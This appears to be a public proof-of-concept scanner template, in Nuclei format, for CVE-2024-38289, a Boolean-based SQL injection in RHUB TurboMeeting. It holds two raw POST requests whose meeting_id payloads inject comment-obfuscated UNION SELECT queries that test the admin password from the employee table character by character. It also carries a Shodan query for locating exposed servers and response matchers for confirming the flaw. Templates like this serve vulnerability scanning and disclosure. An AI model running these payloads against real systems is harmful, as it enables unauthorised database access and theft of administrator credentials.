A Boolean-based SQL injection vulnerability in the "RHUB TurboMeeting" web application. This vulnerability could allow an attacker to execute arbitrary SQL commands on the database server, potentially allowing them to access sensitive data or compromise the server.
PoC代码[已公开]
id: CVE-2024-38289
info:
name: TurboMeeting - Boolean-based SQL Injection
author: rootxharsh,iamnoooob,pdresearch
severity: critical
description: |
A Boolean-based SQL injection vulnerability in the "RHUB TurboMeeting" web application. This vulnerability could allow an attacker to execute arbitrary SQL commands on the database server, potentially allowing them to access sensitive data or compromise the server.
reference:
- https://github.com/google/security-research/security/advisories/GHSA-vx5j-8pgx-v42v
classification:
epss-score: 0.81409
epss-percentile: 0.99137
cpe: cpe:2.3:a:rhubcom:turbomeeting:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: rhubcom
product: turbomeeting
shodan-query: html:"TurboMeeting"
tags: cve,cve2024,sqli,turbomeeting,vkev
http:
- raw:
- |
POST /as/wapi/vmp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
meeting_id=1'/**/OR/**/1=1/**/UNION/**/select/**/password/**/from/**/employee/**/where/**/email='admin'/**/AND/**/substr(password,2,1)='b'/**
- |
POST /as/wapi/vmp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
meeting_id=1'/**/OR/**/1=2/**/UNION/**/select/**/password/**/from/**/employee/**/where/**/email='admin'/**/AND/**/substr(password,2,1)='b'/**
matchers-condition: and
matchers:
- type: word
part: body_1
words:
- '<__Status__>SUCCEED</__Status__>'
- type: word
part: body_2
words:
- '<__Status__>FAILED</__Status__>'
# digest: 4b0a00483046022100d2d7be9a257996cee6d076a1ee9bc7a89f9b78d444be1073fe63adea3f30488e0221008c924349e6399a82b077d5029c796c93400ef2c399ef3b720cbd4300a66b5eaa:922c64590222798bb761d5b6d8e72950